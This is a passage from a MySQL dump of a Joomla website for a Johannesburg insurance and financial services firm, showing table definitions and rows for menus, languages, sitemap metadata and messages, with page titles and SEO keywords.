requirements.','images/smith-and-smith-images-commercial.jpg','',1,0),(6,'https://smithandsmith.co.za/contact','Contact Smith & Smith Financial and Health solutions in Johannesburg','Smith & Smith is a registered financial services provider, providing Personal Insurance, Investments, Health Insurance, Medical Aid. Johannesburg.','images/services-life-cover.jpg','',1,0);
/*!40000 ALTER TABLE `vzx9b_jmap_metainfo` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_pingomatic`
--
DROP TABLE IF EXISTS `vzx9b_jmap_pingomatic`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_pingomatic` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`blogurl` varchar(255) NOT NULL,
`rssurl` varchar(255) DEFAULT NULL,
`services` text NOT NULL,
`lastping` datetime DEFAULT NULL,
`checked_out` int(11) NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_pingomatic`
--
LOCK TABLES `vzx9b_jmap_pingomatic` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_pingomatic` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_pingomatic` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_languages`
--
DROP TABLE IF EXISTS `vzx9b_languages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_languages` (
`lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0,
`lang_code` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
`title` varchar(50) NOT NULL,
`title_native` varchar(50) NOT NULL,
`sef` varchar(50) NOT NULL,
`image` varchar(50) NOT NULL,
`description` varchar(512) NOT NULL,
`metakey` mediumtext NOT NULL,
`metadesc` mediumtext NOT NULL,
`sitename` varchar(1024) NOT NULL DEFAULT '',
`published` int(11) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`lang_id`),
UNIQUE KEY `idx_sef` (`sef`),
UNIQUE KEY `idx_langcode` (`lang_code`),
KEY `idx_access` (`access`),
KEY `idx_ordering` (`ordering`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_languages`
--
LOCK TABLES `vzx9b_languages` WRITE;
/*!40000 ALTER TABLE `vzx9b_languages` DISABLE KEYS */;
INSERT INTO `vzx9b_languages` VALUES (1,0,'en-GB','English (UK)','English (UK)','en','en','','','','',1,1,1);
/*!40000 ALTER TABLE `vzx9b_languages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_menu`
--
DROP TABLE IF EXISTS `vzx9b_menu`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_menu` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
`title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.',
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
`note` varchar(255) NOT NULL DEFAULT '',
`path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
`link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.',
`type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
`published` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'The published state of the menu link.',
`parent_id` int(10) unsigned NOT NULL DEFAULT 1 COMMENT 'The parent menu item in the menu tree.',
`level` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'The relative level in the tree.',
`component_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to #__extensions.id',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to #__users.id',
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
`browserNav` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'The click behaviour of the link.',
`access` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'The access level required to view the menu item.',
`img` varchar(255) NOT NULL COMMENT 'The image of the menu item.',
`template_style_id` int(10) unsigned NOT NULL DEFAULT 0,
`params` mediumtext NOT NULL COMMENT 'JSON encoded data for the menu item.',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`home` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Indicates if this menu item is the home or default page.',
`language` char(7) NOT NULL DEFAULT '',
`client_id` tinyint(4) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`(100),`language`),
KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
KEY `idx_menutype` (`menutype`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_language` (`language`),
KEY `idx_alias` (`alias`(100)),
KEY `idx_path` (`path`(100))
) ENGINE=InnoDB AUTO_INCREMENT=675 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_menu`
--
LOCK TABLES `vzx9b_menu` WRITE;
/*!40000 ALTER TABLE `vzx9b_menu` DISABLE KEYS */;
INSERT INTO `vzx9b_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,87,0,'*',0),(2,'main','com_banners','Banners','','Banners','index.php?option=com_banners','component',1,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,10,0,'*',1),(3,'main','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',2,3,0,'*',1),(4,'main','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',1,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',4,5,0,'*',1),(5,'main','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',6,7,0,'*',1),(6,'main','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',8,9,0,'*',1),(7,'main','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',1,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',23,28,0,'*',1),(8,'main','com_contact_contacts','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',1,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',24,25,0,'*',1),(9,'main','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',1,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',26,27,0,'*',1),(10,'main','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',1,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',29,32,0,'*',1),(11,'main','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',1,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',30,31,0,'*',1),(13,'main','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',1,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',33,38,0,'*',1),(14,'main','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',1,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',34,35,0,'*',1),(15,'main','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',1,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',36,37,0,'*',1),(16,'main','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',1,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',45,46,0,'*',1),(17,'main','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',1,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',43,44,0,'*',1),(21,'main','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',1,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',41,42,0,'*',1),(22,'main','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',1,1,1,28,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',39,40,0,'*',1),(437,'mainmenu','Home','registered-financial-services-provider-in-johannesburg','','registered-financial-services-provider-in-johannesburg','index.php?option=com_sppagebuilder&view=page&id=1','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Smith & Smith - Insurance, Investments, Medical Aid - Registered financial services provider in Johannesburg\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Smith & Smith is a registered financial services provider with the Financial Services Board and supports the initiative on accreditation of financial advisors.\",\"menu-meta_keywords\":\"Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',11,12,1,'*',0),(471,'main','com_tags','com-tags','','com-tags','index.php?option=com_tags','component',1,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',47,48,0,'',1),(472,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',1,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',49,50,0,'*',1),(538,'mainmenu','About us','about-smith-and-smith-financial-solutions','','about-smith-and-smith-financial-solutions','index.php?option=com_sppagebuilder&view=page&id=7','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"About Smith & Smith - Registered Financial Service Provider in Johannesburg\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Smith & Smith strives for the highest levels of professional service in all our dealings by giving clients informed advice that they can trust.\\r\\n\\r\\nWith knowledge and experience in all the financial disciplines \\u2013 from healthcare to short-term insurance, investment planning and life assurance \\u2013 we deal with corporates as well as individuals.\",\"menu-meta_keywords\":\"Johannesburg, Smith and Smith, healthcare, Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"538\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',13,14,0,'*',0),(540,'mainmenu','Contact','contact','','contact','index.php?option=com_sppagebuilder&view=page&id=8','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Contact Smith & Smith regarding Financial and Health solutions in Johannesburg\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"Johannesburg, Smith and Smith, healthcare, Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"540\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',21,22,0,'*',0),(549,'mainmenu','Personal Solutions','smith-and-smith-personal-solutions','','smith-and-smith-personal-solutions','index.php?option=com_sppagebuilder&view=page&id=9','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Personal Financial and Health solutions from Smith & Smith\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Smith & Smith provides personal solutions covering everything that is required for you to live your life without having to worry about the \\u201cwhat ifs\\u201d. With our easy-to-understand approach, we offer complete solutions that fit your individual needs and circumstances.\",\"menu-meta_keywords\":\"Johannesburg, Smith and Smith, healthcare, Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"549\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',15,16,0,'*',0),(550,'mainmenu','Corporate Solutions','smith-and-smith-corporate-solutions','','smith-and-smith-corporate-solutions','index.php?option=com_sppagebuilder&view=page&id=10','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Corporate Financial and Health solutions from Smith & Smith, Johannesburg\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Owning your own business comes with many unique responsibilities, risks and investment opportunities. We offer comprehensive business insurance products as well as affordable group healthcare coverage and investment solutions that suit your enterprise\\u2019s specific requirements.\",\"menu-meta_keywords\":\"Johannesburg, Smith and Smith, healthcare, Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"550\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',17,18,0,'*',0),(551,'mainmenu','FAQ\'s','faq-s','','faq-s','index.php?option=com_sppagebuilder&view=page&id=11','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"FAQ\'s about Financial and Health solutions from Smith & Smith, Johannesburg\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Frequently Asked Questions - Confused about financial terms or the difference between life insurance and life assurance? Our list of frequently asked questions aims to put serious matters into simple terms.\",\"menu-meta_keywords\":\"Johannesburg, Smith and Smith, healthcare, Life assurance, Indemnity insurance, Domestic short-term insurance, Vehicle insurance, Investments, Retirement planning, Drafting of legal agreements,, buy & sell agreements, Healthcare for individuals & families, Corporate Wellness, Funeral Cover, Wills, Commercial short-term insurance, Group healthcare, Employee benefits, pension and provident funds, Investment solutions & advice, Risk management, Retirement solutions, Finance planning, Business consulting (fee-based), Drafting of legal agreements, buy & sell agreements, shareholder agreements\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"551\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',19,20,0,'*',0),(625,'main','COM_SNIPPETS','com-snippets','','com-snippets','index.php?option=com_snippets','component',1,1,1,10045,0,'0000-00-00 00:00:00',0,1,'../media/snippets/images/snippets.png',0,'{}',51,52,0,'',1),(646,'main','COM_DJIMAGESLIDER','com-djimageslider','','com-djimageslider','index.php?option=com_djimageslider','component',1,1,1,10038,0,'0000-00-00 00:00:00',0,1,'components/com_djimageslider/assets/icon-16-djimageslider.png',0,'{}',53,54,0,'',1),(649,'main','COM_ADMINTOOLS','com-admintools','','com-admintools','index.php?option=com_admintools','component',1,1,1,10019,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',55,56,0,'',1),(650,'main','COM_AKEEBA','com-akeeba','','com-akeeba','index.php?option=com_akeeba','component',1,1,1,10013,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',57,58,0,'',1),(651,'main','JMAP','jmap','','jmap','index.php?option=com_jmap','component',1,1,1,10095,0,'0000-00-00 00:00:00',0,1,'class:jmap-16x16',0,'{}',59,60,0,'',1),(654,'mainmenu','Thank you','thank-you','','thank-you','index.php?option=com_sppagebuilder&view=page&id=12','component',-2,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',61,62,0,'*',0),(655,'links','Thank you','thankyou','','thankyou','index.php?option=com_sppagebuilder&view=page&id=12','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',63,64,0,'*',0),(656,'main','COM_IMAGERECYCLE','com-imagerecycle','','com-imagerecycle','index.php?option=com_imagerecycle','component',1,1,1,10031,0,'0000-00-00 00:00:00',0,1,'components/com_imagerecycle/assets/images/com_imagerecycle-16.png',0,'{}',65,66,0,'',1),(657,'main','COM_SPPAGEBUILDER','com-sppagebuilder','','com-sppagebuilder','index.php?option=com_sppagebuilder','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',67,68,0,'',1),(666,'main','COM_BREEZINGFORMS','com-breezingforms','','com-breezingforms','index.php?option=com_breezingforms','component',1,1,1,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',69,84,0,'',1),(667,'main','COM_BREEZINGFORMS_MANAGE_RECORDS','com-breezingforms-manage-records','','com-breezingforms/com-breezingforms-manage-records','index.php?option=com_breezingforms&act=managerecs','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',70,71,0,'',1),(668,'main','COM_BREEZINGFORMS_MANAGE_FORMS','com-breezingforms-manage-forms','','com-breezingforms/com-breezingforms-manage-forms','index.php?option=com_breezingforms&act=manageforms','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',72,73,0,'',1),(669,'main','COM_BREEZINGFORMS_MANAGE_SCRIPTS','com-breezingforms-manage-scripts','','com-breezingforms/com-breezingforms-manage-scripts','index.php?option=com_breezingforms&act=managescripts','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',74,75,0,'',1),(670,'main','COM_BREEZINGFORMS_MANAGE_PIECES','com-breezingforms-manage-pieces','','com-breezingforms/com-breezingforms-manage-pieces','index.php?option=com_breezingforms&act=managepieces','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',76,77,0,'',1),(671,'main','COM_BREEZINGFORMS_INTEGRATOR','com-breezingforms-integrator','','com-breezingforms/com-breezingforms-integrator','index.php?option=com_breezingforms&act=integrate','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',78,79,0,'',1),(672,'main','COM_BREEZINGFORMS_MANAGE_BACKEND_MENUS','com-breezingforms-manage-backend-menus','','com-breezingforms/com-breezingforms-manage-backend-menus','index.php?option=com_breezingforms&act=managemenus','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',80,81,0,'',1),(673,'main','COM_BREEZINGFORMS_CONFIGURATION','com-breezingforms-configuration','','com-breezingforms/com-breezingforms-configuration','index.php?option=com_breezingforms&act=configuration','component',1,666,2,10048,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',82,83,0,'',1),(674,'links','Cookie Policy','cookie-policy','','cookie-policy','index.php?option=com_sppagebuilder&view=page&id=13','component',1,1,1,10004,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"674\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',85,86,0,'*',0);
/*!40000 ALTER TABLE `vzx9b_menu` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_menu_types`
--
DROP TABLE IF EXISTS `vzx9b_menu_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_menu_types` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0,
`menutype` varchar(24) NOT NULL,
`title` varchar(48) NOT NULL,
`description` varchar(255) NOT NULL DEFAULT '',
`client_id` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_menu_types`
--
LOCK TABLES `vzx9b_menu_types` WRITE;
/*!40000 ALTER TABLE `vzx9b_menu_types` DISABLE KEYS */;
INSERT INTO `vzx9b_menu_types` VALUES (4,0,'mainmenu','Main Menu','Main Menu',0),(5,243,'links','links','',0);
/*!40000 ALTER TABLE `vzx9b_menu_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_messages`
--
DROP TABLE IF EXISTS `vzx9b_messages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_messages` (
`message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id_from` int(10) unsigned NOT NULL DEFAULT 0,
`user_id_to` int(10) unsigned NOT NULL DEFAULT 0,
`folder_id` tinyint(3) unsigned NOT NULL DEFAULT 0,
`date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`state` tinyint(1) NOT NULL DEFAULT 0,
`priority` tinyint(1) unsigned NOT NULL DEFAULT 0,
`subject` varchar(255) NOT NULL DEFAULT '',
`message` mediumtext NOT NULL,
PRIMARY KEY (`message_id`),
KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_messages`
--
LOCK TABLES `vzx9b_messages` WRITE;
/*!40000 ALTER TABLE `vzx9b_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_messages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_messages_cfg`
--
DROP TABLE IF EXISTS `vzx9b_messages_cfg`;
